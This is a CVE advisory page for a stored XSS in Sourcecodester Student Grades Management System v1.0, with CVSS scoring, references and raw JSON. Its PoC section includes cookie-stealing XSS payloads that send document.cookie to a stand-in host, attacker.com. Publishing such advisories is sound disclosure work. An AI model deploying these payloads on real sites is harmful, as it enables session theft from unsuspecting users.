Security Vulnerability Report
CVE-2025-64070 CVSS 5.4 MEDIUM

CVE-2025-64070

Published: 2025-12-02 17:16:06
Last Modified: 2025-12-03 20:13:03

Description

Sourcecodester Student Grades Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in the Add New Subject Description field.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:remyandrade:student_grades_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Sourcecodester Student Grades Management System v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-64070 PoC - Stored XSS in Add New Subject Description -->
<!-- Login to Sourcecodester Student Grades Management System v1.0 -->
<!-- Navigate to Add New Subject functionality -->
<!-- Enter the following payload in the Description field: -->
<script>alert('XSS Vulnerability - CVE-2025-64070')</script>
<!-- Alternative payloads: -->
<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>
<img src=x onerror="fetch('https://attacker.com/log?c='+document.cookie)">
<svg/onload=fetch('https://attacker.com/exfil?data='+btoa(document.cookie))>
<!-- After submission, any user viewing the subject will trigger the XSS -->

References

https://github.com/vabnamoni/CVE-Researches/blob/main/CVE-2025-64070 (Exploit, Mitigation, Third Party Advisory)
https://www.linkedin.com/in/vabna-lina-24ab17186/ (Not Applicable)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64070", "sourceIdentifier": "[email protected]", "published": "2025-12-02T17:16:06.113", "lastModified": "2025-12-03T20:13:03.247", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sourcecodester Student Grades Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in the Add New Subject Description field."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:remyandrade:student_grades_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "3598B8C3-795C-4F26-9376-73D791CD287B"}]}]}], "references": [{"url": "https://github.com/vabnamoni/CVE-Researches/blob/main/CVE-2025-64070", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://www.linkedin.com/in/vabna-lina-24ab17186/", "source": "[email protected]", "tags": ["Not Applicable"]}]}}